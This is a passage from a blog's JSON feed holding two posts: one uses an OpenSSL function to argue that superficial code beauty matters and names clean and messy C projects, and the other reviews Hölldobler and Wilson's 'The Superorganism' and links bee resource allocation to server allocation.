Actually, it doesn&#39;t have<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * much to do with CAs, either, since it will load any old cert.<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * <\/span><span style=\"color: #D73A49;\">\\param<\/span><span style=\"color: #E36209;\"> file<\/span><span style=\"color: #6A737D;\"> the file containing one or more certs.<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * <\/span><span style=\"color: #D73A49;\">\\return<\/span><span style=\"color: #6A737D;\"> a ::STACK containing the certs.<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> *\/<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">STACK_OF<\/span><span>(X509_NAME)<\/span><span style=\"color: #D73A49;\"> *<\/span><span style=\"color: #6F42C1;\">SSL_load_client_CA_file<\/span><span>(<\/span><span style=\"color: #D73A49;\">const char *<\/span><span style=\"color: #E36209;\">file<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>    {<\/span><\/span>\n<span class=\"giallo-l\"><span>    BIO <\/span><span style=\"color: #D73A49;\">*<\/span><span>in;<\/span><\/span>\n<span class=\"giallo-l\"><span>    X509 <\/span><span style=\"color: #D73A49;\">*<\/span><span>x<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span>    X509_NAME <\/span><span style=\"color: #D73A49;\">*<\/span><span>xn<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    STACK_OF<\/span><span>(X509_NAME)<\/span><span style=\"color: #D73A49;\"> *<\/span><span>ret <\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>,<\/span><span style=\"color: #D73A49;\">*<\/span><span>sk;<\/span><\/span>\n<span 
class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span>    sk<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\">sk_X509_NAME_new<\/span><span>(xname_cmp);<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span>    in<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\">BIO_new<\/span><span>(<\/span><span style=\"color: #6F42C1;\">BIO_s_file_internal<\/span><span>());<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> ((sk <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #D73A49;\"> ||<\/span><span> (in <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>))<\/span><\/span>\n<span class=\"giallo-l\"><span>        {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">        SSLerr<\/span><span>(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><span>        }<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (<\/span><span style=\"color: #D73A49;\">!<\/span><span style=\"color: #6F42C1;\">BIO_read_filename<\/span><span>(in,file))<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> (;;)<\/span><\/span>\n<span class=\"giallo-l\"><span>        {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (<\/span><span style=\"color: #6F42C1;\">PEM_read_bio_X509<\/span><span>(in,<\/span><span style=\"color: 
#D73A49;\">&amp;<\/span><span>x,<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>,<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>)<\/span><span style=\"color: #D73A49;\"> ==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            break<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (ret <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>            {<\/span><\/span>\n<span class=\"giallo-l\"><span>            ret <\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\"> sk_X509_NAME_new_null<\/span><span>();<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            if<\/span><span> (ret <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>                {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">                SSLerr<\/span><span>(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><span>                }<\/span><\/span>\n<span class=\"giallo-l\"><span>            }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> ((xn<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\">X509_get_subject_name<\/span><span>(x))<\/span><span style=\"color: #D73A49;\"> ==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #D73A49;\"> goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">        \/* check for duplicates 
*\/<\/span><\/span>\n<span class=\"giallo-l\"><span>        xn<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\">X509_NAME_dup<\/span><span>(xn);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (xn <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #D73A49;\"> goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (<\/span><span style=\"color: #6F42C1;\">sk_X509_NAME_find<\/span><span>(sk,xn)<\/span><span style=\"color: #D73A49;\"> &gt;=<\/span><span style=\"color: #005CC5;\"> 0<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">            X509_NAME_free<\/span><span>(xn);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        else<\/span><\/span>\n<span class=\"giallo-l\"><span>            {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">            sk_X509_NAME_push<\/span><span>(sk,xn);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">            sk_X509_NAME_push<\/span><span>(ret,xn);<\/span><\/span>\n<span class=\"giallo-l\"><span>            }<\/span><\/span>\n<span class=\"giallo-l\"><span>        }<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (<\/span><span style=\"color: #005CC5;\">0<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>        {<\/span><\/span>\n<span class=\"giallo-l\"><span>err:<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (ret <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> sk_X509_NAME_pop_free<\/span><span>(ret,X509_NAME_free);<\/span><\/span>\n<span 
class=\"giallo-l\"><span>        ret<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span>        }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (sk <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> sk_X509_NAME_free<\/span><span>(sk);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (in <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> BIO_free<\/span><span>(in);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (x <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> X509_free<\/span><span>(x);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (ret <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">        ERR_clear_error<\/span><span>();<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span>(ret);<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">#endif<\/span><\/span><\/code><\/pre>\n<p>His objections boil down to the following:<\/p>\n<ul>\n<li>The indentation style is weird, and in many circumstances hard to parse.<\/li>\n<li>The project uses a mixture of CamelCase and underscore-based function naming.<\/li>\n<li>The error cleanup strategy is bizarre - using a goto to jump into code\nguarded by an \"if(0)\" is distinctly unlovely.<\/li>\n<li>In this example, the function 
name mis-characterises what the function\nactually does. The somewhat shame-faced comment doesn't fix the problem, it\njust makes it funny.<\/li>\n<li>The project suffers from ifdef-itis.<\/li>\n<li>Most importantly, the code does not \"read\" well. In this case, we find\nmultiple levels of indirection, and no clear flow to the function.<\/li>\n<\/ul>\n<p>So, while Marco's problem <em>started<\/em> with the project's shoddy documentation and\nAPI, his actual code criticism focuses on issues that are apparently\nsuperficial. He hasn't discovered a substantive bug or architectural weakness in\nthe snippet above. Instead, what matters to him are simple virtues like\nconsistency, style, and readability. Marco is saying, in fact, that the OpenSSL\ncode sucks because it lacks superficial beauty. I couldn't agree with this\nposition more.<\/p>\n<p>I'm reminded of a recent blog post describing \"the perfect interview question\"\nfor programmers: ask them what bothered them most when reviewing other people's\ncode. The blogger argued that a response focusing on superficial code quality\nmeant that the interviewee was obviously not an \"architectural thinker\", and was\ntherefore a poor candidate. This is utter tripe. Good programmers know that a\nlack of superficial code quality and consistency is the <em>best<\/em> indicator of\ndeeper systemic problems in a project.  If you ever need a quick estimate of the\nquality of a codebase, this is what you should look at first. If you ever have\nto work on a project with poor code quality, fix the superficial issues first.\nUgly code will obscure deeper architectural issues, increase defect rates, make\ncode review hell, and make the project hard to refactor. 
This is advice so basic\nthat it usually does not need to be given - good coders understand the\nimportance of superficial beauty at such a deep instinctive level that they will\nfeel <em>compelled<\/em> to fix cleanliness and neatness issues before working on deeper\nproblems.<\/p>\n<p>Superficial beauty is not something that is discussed nearly enough in the Open\nSource world, so I'm going to don my flame-retardant poncho, and name some\nnames. In keeping with this post's starting point, I'm going to focus on\nprojects in C. Let's start with the ugly. The codebase for\n<a rel=\"external\" href=\"http:\/\/www.vim.org\/\">Vim<\/a>, a tool that I spend hours using every day, turns out\nto be a frightening and inscrutable thicket of #ifdefs. The Linux kernel is\nimmensely variable in quality - some of it is very good, some of it - especially\nless widely used drivers - is unspeakable. The <a rel=\"external\" href=\"http:\/\/www.mutt.org\/\">mutt<\/a>\ncodebase is pretty terrible, prominently featuring one of my pet bugaboos -\nmixing tabs and spaces, invisibly screwing up indentation depending on your\neditor configuration. The <a rel=\"external\" href=\"http:\/\/www.wireshark.org\/\">Wireshark<\/a> packet sniffer -\nanother project I use daily - is so bad that OpenBSD <a rel=\"external\" href=\"http:\/\/www.openbsd.org\/cgi-bin\/cvsweb\/ports\/net\/ethereal\/Attic\/Makefile?hideattic=0\">opted to\nremove<\/a>\nit from their ports tree rather than encourage their users to use it. Wireshark\nwins a special prize for over-commenting. They've clearly abandoned all hope of\ncommunicating their intentions through the code itself, degenerating instead to\nthings like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"c\"><span class=\"giallo-l\"><span style=\"color: #6A737D;\">\/* Now bump the count. 
*\/<\/span><\/span>\n<span class=\"giallo-l\"><span>(<\/span><span style=\"color: #D73A49;\">*<\/span><span>argc)<\/span><span style=\"color: #D73A49;\">++<\/span><span>;<\/span><\/span><\/code><\/pre>\n<p>I'll end the post on a high note, with some examples of great code quality.\nOpenBSD is undoubtedly one of the pin-up projects of the Open Source world,\nfeaturing code that is almost supernaturally clean, consistent and direct. If\nyou're interested in taking a look, I recommend starting with some of their\nrecent daemon development - their\n<a rel=\"external\" href=\"http:\/\/www.openbsd.org\/cgi-bin\/cvsweb\/src\/usr.sbin\/smtpd\/?sortby=date#dirlist\">SMTP<\/a>\nand <a rel=\"external\" href=\"http:\/\/www.openbsd.org\/cgi-bin\/cvsweb\/src\/usr.sbin\/ntpd\/?sortby=date\">NTP<\/a>\ndaemons are good candidates. Another excellent project to look at is the C\nPython interpreter, which shares many of OpenBSD's virtues. Note that I mean the\ninterpreter itself - the standard library is unexpectedly variable in\nquality. A more obscure project with great code quality is the <a rel=\"external\" href=\"http:\/\/plan9.bell-labs.com\/sources\/plan9\/sys\/src\/\">Plan9 operating\nsystem<\/a>. 
Sadly, Plan9 never\ntook off (perhaps because it wasn't free software from the beginning), but the\ncodebase illustrates many of the sound principles outlined by Kernighan and\nPike - both of whom were involved in Plan9 - in <a\nhref=\"https:\/\/www.amazon.com\/Practice-Programming-Addison-Wesley-Professional-Computing\/dp\/020161586X\">The\nPractice of Programming<\/a>.<\/p>\n<p><strong>edit:<\/strong> Meanwhile, over on\n<a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/programming\/comments\/a0s6o\/in_praise_of_superficial_beauty_a_followup_to\/\">reddit<\/a>\ndagbrown has pointed out\n<a rel=\"external\" href=\"http:\/\/opensource.apple.com\/source\/procmail\/procmail-1.2\/procmail\/src\/procmail.c\">procmail<\/a>,\nwhich turns out to be an absolutely unparalleled phenomenon. Go on, have a look - I dare ya.<\/p>\n"},{"title":"Non-programming books for Programmers: The Superorganism, H\u00f6lldobler & Wilson","published":"2009-10-25T00:00:00+00:00","updated":"2009-10-25T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/books\/superorganism\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/books\/superorganism\/","content":"<div class=\"media\">\n    <a href=\"https:&#x2F;&#x2F;www.amazon.com&#x2F;Superorganism-Beauty-Elegance-Strangeness-Societies&#x2F;dp&#x2F;0393067041&#x2F;ref=sr_1_1?dchild=1&amp;keywords=superorganism&amp;qid=1592693625&amp;s=books&amp;sr=1-1\">\n        <img src=\"superorganism-cover.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Superorganism\n    <\/div>\n    \n<\/div>\n<p>It's impossible to talk about <em>The Superorganism<\/em> without first mentioning <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Bert_Holldobler\">Bert\nH\u00f6lldobler<\/a> and <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/E._O._Wilson\">E. O.\nWilson<\/a>'s most famous collaboration -\na book called simply <em>The Ants<\/em>. 
I've been fascinated with ants since childhood,\nand <em>The Ants<\/em> is one of my favourite books - deep enough to be intellectually\nsatisfying on almost any detail, and broad enough to be one of those rare books\nthat summarizes nearly everything to be said about its subject. It's hard to\navoid platitudes like \"authoritative\" and \"magisterial\" when talking about a\nbook like this, so I will resort to a simple computer science analogy: <em>The\nAnts<\/em> is to the study of ants what <em>The Art of Computer Programming<\/em> is to the\nstudy of algorithms. Only more so, because unlike Knuth, H\u00f6lldobler and Wilson\nactually completed their survey in 1990. It should be no surprise then, that I\nhad <em>The Superorganism<\/em> on pre-order as soon as I heard that H\u00f6lldobler and\nWilson were publishing their first new book in almost two decades. <em>The\nSuperorganism<\/em> expands on a theme that also lies at the heart of <em>The Ants<\/em> -\nthe workings of insect societies. <em>The Superorganism<\/em> paints with a broader\nbrush than its predecessor, touching frequently on the other great families of\neusocial insects - termites, bees and wasps.<\/p>\n<div class=\"media\">\n    <a href=\"atta_cephalotes.jpg\">\n        <img src=\"atta_cephalotes.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Atta cephalotes, Costa Rica\n    <\/div>\n    \n<\/div>\n<p>If you haven't delved into the world of social insects before, you're in for a\ntreat. The range and complexity of social insect behaviour can be weirder and\nmore wonderful than anything found in science fiction. Consider, for example,\nthe lives of what the authors call the \"ultimate superorganism\": the\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Attini\">Attine<\/a> leafcutter ants. The remarkable\nfact about the leafcutters is that they are farmers, cultivating vast fungal\ngardens that provide them with essential nutrients.  
These fungal gardens are\ngrown on a substrate of leaf-matter, and leafcutters get their name from the\nfact that colonies cut up enormous quantities of leaves to transport back to\ntheir nests - one mature colony was estimated to harvest a leaf area of 4550\nsquare meters per year. The fungus gardens are the lifeblood of the leafcutter\ncolony, and they are tended with endless patience and skill. Leaves brought back\nto the nest are snipped up, molded into pellets, and carefully planted with\nfungal hyphae taken from elsewhere in the garden. Workers patrol the fungal\ngardens ceaselessly, weeding out foreign fungal strains and other contaminants.\nThe ants secrete antibiotics that inhibit the growth of other fungi, and produce\ngrowth hormones that enhance the growth of their own strain. They wage an\nendless battle against <em>Escovopsis<\/em>, a parasitic species of fungus that\nspecialises in invading Attine leafcutter gardens.  Remarkably, an important\npart of their arsenal is a second symbiont: a bacterium that only occurs on the\ncuticle of leafcutter ants, which produces powerful antibiotics specific to the\nfungal pest. The ants grow these bacterial weapons on special patches of\ncuticle, modified specifically to house them. There is also a degree of\ncommunication between the ants and their garden fungus. Leafcutter ants are\nsensitive to the chemical signals released by distressed fungus, and learn to\navoid food that harms their gardens. When a new queen leaves the nest to mate\nand establish a colony of her own, she carries a sample of the fungus from her\nparent colony in a cavity next to her oesophagus. Once she has found a likely\nnesting spot, she spits out the fungal sample, and tends the growing cultivar as\nclosely as she does her own offspring, feeding it with secreted fluid, while she\nherself subsists off her own bodyfat. 
Once the first brood of workers have been\nraised, the queen assumes her proper position as the egg-laying machine at the\ncenter of the colony, feeding on unfertilized eggs laid by her workers. If her\ncolony is successful, she will produce about 20 eggs a minute, 24 hours a day,\nresulting in between 150 and 200 million offspring during her life. The colony\ncan consist of several million ants at any one time. This population is housed\nin a colossal nest - one typical example had 1920 chambers with 238 fungus\ngardens.  To build it, the ants had to shift 40 tonnes of soil. The nest itself\nis designed to provide optimal ventilation and humidity for the fungal gardens,\nand is continually adjusted by the ants to achieve the right conditions.\nStretching out from the nest is a set of foraging tunnels that surface into a\nweb of trunk routes along which leaf material is brought back to the nest.\nTrunk routes are meticulously maintained, with \"road workers\" clearing debris\nand encroaching vegetation.  Within the ant population there are a range of\nphysical castes, each adapted to a specific set of jobs. The smallest workers\nmaintain and patrol the fungal gardens. The largest are gigantic supersoldiers\nthat specialise in deterring vertebrate predators. Underpinning all of this is a\nsophisticated chemical communication system, involving a huge array of\npheromones, and an incredibly sensitive sensory system. H\u00f6lldobler and Wilson\ncite research that shows that one milligram of the trail pheromone of <em>Atta\ntexana<\/em> is enough to lead a worker 60 times around the Earth.<\/p>\n<p>Ponder for a moment the immense behavioural complexity required to sustain a\nsophisticated insect civilization like this. There are an extraordinary number\nof behaviours that need to be optimized, many of which read like they are\nstraight from the pages of a programming competition. Foraging strategies need\nto be devised to efficiently discover food sources. 
Once a food source is\ndiscovered, its value needs to be estimated, and the right fraction of the\ncolony's labour pool needs to be allocated to exploit it. Throughput needs to be\noptimised by selecting the right leaf fragment size, while minimizing the\nsignificant energetic cost of cutting leaves up smaller than necessary. The cost\nof constructing and maintaining the web of trunk routes needs to be weighed\nagainst the efficiency benefits gained (it turns out that they can improve\nforaging speed tenfold). There are many, many other interesting sub-problems\nlike these, and the colony solves them all admirably. The entire system reminds\none of a super-complicated real-time strategy game, and we can be forgiven for\nsuspecting that there must be some hyper-intelligent controller micromanaging a\n<a rel=\"external\" href=\"http:\/\/starcraft.wikia.com\/wiki\/Zerg\">Zerg-like<\/a> expansion of the nest. Here,\nhowever, we come to perhaps the most remarkable fact about social insects: their\ncolonies are leaderless. There is no central strategist at all - their entire\nrange of sophisticated behaviour is emergent, arising from the aggregate actions\nof many small simple units with only local information. And yet, millions of\nants can act with such apparent coherence and purpose that biologists like\nH\u00f6lldobler and Wilson have started thinking of colonies as organisms in\nthemselves - \"superorganisms\" that compete, mate, and strive for survival.<\/p>\n<p>Humanity has not yet learned how to cross the chasm that separates the\nindividual ant from the superorganism. We've seen the early glimmers of\ntechnologically produced distributed systems - one thinks of things like the\nInternet, peer-to-peer networks, and maybe some nebulous social constructs like\n\"the blogosphere\". The fact is, however, that we are simply incapable of\ndesigning distributed systems that even begin to approach the robustness and\nintricacy of insect colonies. 
<em>The Superorganism<\/em> is certainly not a manual for\napplying insectoid principles of distributed engineering to technological\nproblems. It is, however, the best available overview of the best distributed\nsystems we know of, and for that reason alone should be on every intellectually\ncurious computer scientist's bookshelf.<\/p>\n<h2 id=\"bees-resource-allocation-peer-to-peer-communication-and-tiered-architectures\">Bees: resource allocation, peer-to-peer communication and tiered architectures<\/h2>\n<div class=\"media\">\n    <a href=\"waggle-dance.jpg\">\n        <img src=\"waggle-dance.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        The essential form of the honeybee waggle dance, p. 170 of The Superorganism. Reproduced here with the kind permission of its creator, <a href='http:\/\/www.margynelson.com\/RumfordGraphics-Front-Page.html'>Margaret Nelson<\/a>\n    <\/div>\n    \n<\/div>\n<p>That's all very exciting, but it's not very concrete. So, for the second part of\nthis review, I'll look at one example of distributed problem solving covered in\n<em>The Superorganism<\/em>, and explore its fascinating parallels with computer science.<\/p>\n<p>The best-studied insect society is surely that of <em>Apis mellifera<\/em>, the\nhoneybee. In 1947 <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Karl_von_Frisch\">Karl von\nFrisch<\/a> famously decoded part of\nthe \"dance language\" of the honeybee, showing that the bee <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Waggle_dance\">waggle\ndance<\/a> was used to convey precise\ninformation about the distance, direction and quality of a food source to nearby\nbees. The amazing discovery that bees conveyed complex abstract notions of this\ntype to each other gave us an early insight into the wonder of social insect\ncommunication. 
Over the years since von Frisch's discovery, it has gradually\nemerged that the waggle dance is just one of a complex set of signals used to\nimplement a distributed resource allocation strategy inside the bee colony. The\nbees in a hive are loosely specialised into \"foragers\", who go out of the hive\nto gather food, and \"nectar processors\", who remain in the hive to receive\nnectar from incoming foragers for processing and storage. When a forager returns\nto the nest laden with pollen and nectar, it searches until it finds a free\nprocessor to accept its cargo. The first optimisation problem the hive faces is\nto balance these two populations of specialists, minimising the waiting time for\nforagers dropping off their cargos as well as idle time for processors waiting\nto accept them.  The second optimisation problem arises from the fact that the\nsupply of nectar sources is not constant - if a new grove of flowers in bloom is\ndiscovered, the hive has to divert resources to exploit it as quickly as\npossible, adjusting the number of foragers and processors to match. This is\ncomplicated by the fact that not all nectar sources are equal: some might be\nparticularly rich, and therefore require more foragers to exploit. A particular\nbee hive might be extracting nectar from a number of flower patches at the same\ntime, and foragers need to be allocated optimally, and continually re-balanced.\nRemarkably, the bee colony accomplishes these goals without any central\nco-ordination, using an entirely distributed algorithm. To see how they do this,\nwe need to flesh out the bee dance language somewhat.  
H\u00f6lldobler and Wilson\ndescribe three basic bee dances:<\/p>\n<ul>\n<li><strong>Waggle dance<\/strong>: The famous dance discovered by von Frisch, which directs\nforager bees to a specific resource with precise information on the location\nand distance.<\/li>\n<li><strong>Shaking dance<\/strong>: Recruits more bees to foraging, sending them to the dance\nfloor to look for waggle dancers.<\/li>\n<li><strong>Tremble dance<\/strong>: Induces waggle dancers to stop dancing, and recruits bees\nto nectar processing.<\/li>\n<\/ul>\n<p>These dances are signals that provide the communications framework for the \"bee\nalgorithm\", sketched out by H\u00f6lldobler and Wilson in the following set of\ndecision rules:<\/p>\n<blockquote>\n<p>1 | Not enough nectar collectors in the field? If yes, and you also\nhave immediate knowledge of a producing flower patch, perform the\nwaggle dance.<\/p>\n<p>2 | Is the flower patch rich or the weather fine or the day early or\ndoes the colony need substantially more food? Perform the dance with\nappropriately greater vivacity and persistence.<\/p>\n<p>3 | Not enough active foragers to send into the field? Perform the\nshaking maneuver.<\/p>\n<p>4 | Not enough nectar processors in the hive to handle the nectar\ninflow? Perform the tremble dance.<\/p>\n<\/blockquote>\n<p>So, how do bees decide if there are too many foragers or too many nectar\nprocessors, using purely local information? The answer is simple and elegant: if\na returning forager experiences a wait time of 20 seconds or less before finding\na nectar processor, they assume that there is a surplus of processors and\nrecruit more bees to foraging through the waggle dance. If they experience a\nwait time of 50 seconds or more, they assume that there are too many foragers,\nand use the tremble dance to both reduce the number of foragers and increase the\nnumber of processors. 
Notice that all the signals used in this system are \"peer\nto peer\" - bees only communicate with nearby bees that are in the hive at the\nmoment of communication.<\/p>\n<p>The system described above is clear enough to implement easily, and there is a\nrich range of parallels with computer science. It's not surprising, therefore,\nthat a bit of searching through the literature shows that a number of computer\nscientists have started mining the bee resource allocation algorithm for ideas.\nOne nice example comes from Sunil Nakrani and <a rel=\"external\" href=\"http:\/\/www2.isye.gatech.edu\/~ctovey\/\">Craig\nTovey<\/a>, who have successfully applied a\nsubset of the behaviour outlined above in a paper called <a rel=\"external\" href=\"http:\/\/www2.isye.gatech.edu\/~ctovey\/publications\/papers\/bee.oct19.2004.masi2.pdf\">On Honey Bees and\nDynamic Allocation in an Internet Server\nColony<\/a>.\nConsider a hypothetical data center of servers used to implement a hosted\napplication environment. Each application is backed by a dynamic pool of virtual\nservers, and servers can be added to or removed from the pools transparently.\nThere is, however, a switching cost to moving resources about - re-allocating a\nvirtual server involves server downtime and therefore lost revenue. Application\nload varies unpredictably - one day an application might be getting three hits a\nday, and the next it might crop up on Reddit and have a massive load spike. The\nhosting company is paid based on usage - say, per HTTP request served - and\nfaces the complex problem of optimally allocating its server resources to\nminimize downtime and maximize revenue. Nakrani and Tovey approach this problem\nby mapping the bee resource allocation system onto the server allocation\nproblem.  In this mapping, foraging bees are the servers, and flower patches are\nthe applications. 
In nature, the bee recruitment signal - the waggle dance\ndescribed above - is triggered if a flower patch is sufficiently \"profitable\".\nThe more profitable the nectar source, the greater the \"vivacity and\npersistence\" of the recruitment signal. Nakrani and Tovey simulated a system\nwhere servers used a central advertboard to post recruitment adverts. In broad\nterms, Nakrani and Tovey's servers were more likely to read a random advert from\nthe advertboard, and switch to a different application, when their current\napplication was less profitable. On the other hand, a server was more likely to\npost an advert to recruit more servers to its application, if its application\nwas more profitable. The result is a distributed algorithm that performs within\nabout 11.5% of an omniscient resource allocator with complete knowledge of all\nfuture HTTP requests.<\/p>\n<p>Interestingly, Nakrani and Tovey also had something to teach entomologists. They\nfound that while the bee recruitment algorithm performed superbly when there was\na lot of variability in application load, it was outperformed by much simpler\nalgorithms when load was relatively static. Their simulation therefore seems to\nindicate that the bee recruitment algorithm is an adaptation to variability in\nnectar sources. While this blog post focuses on what computer scientists can\nlearn from insects, the possibility that information might flow the other way is\na fascinating one. When I first read about the loose specialisation in the\nbeehive, with foragers handing over their load to processors, my immediate\nthought was that this described a tiered architecture. Now, there are a number\nof sound non-architectural reasons why a colony would want to have some bees\nspecialise in foraging. Foragers tend to be the older bees in the colony, and\nthis makes complete sense. Foraging is a hazardous activity, and bees have a\nlimited lifespan. 
Sending out bees that are approaching the end of their lives\nanyway is good economics. H\u00f6lldobler and Wilson write that this specialisation<\/p>\n<blockquote>\n<p>... causes a problem for the honeybee colony: How can the rate of food\ncollection, particularly of nectar, and the rate of food processing be kept\nin balance?<\/p>\n<\/blockquote>\n<p>The computer scientist in me suspects that there may be a different way to look\nat this aspect of bee behaviour. In computing we produce tiered architectures\nwith independent layers because they <em>improve<\/em> efficiency and flexibility in\nvarious ways. I can't help but wonder if a similar benefit might support this\naspect of bee behaviour.<\/p>\n<h2 id=\"postscript\">Postscript<\/h2>\n<p>One last note before I'm done. Karl von Frisch once said that<\/p>\n<blockquote>\n<p>... the life of bees is like a magic well. The more you draw from it, the\nmore there is to draw.<\/p>\n<\/blockquote>\n<p>There are some 20,000 species of bee in the world, ranging from solitary species\nto the great super-societies of domestic honeybees. There are 14,000 species of\nants, 4,000 species of termite, and more than 100,000 species of wasp. Each of\nthese species is a unique product of evolution's boundless ingenuity, and each\nhas its own suite of solutions to the problems of survival. When one of these\nspecies disappears - and they are doing so at a terrifying rate - the tragedy is\nnot simply that something beautiful is irretrievably gone from the world, but\nalso that we have lost another irreplaceable magic well to study, learn from,\nand emulate.  E. O. 
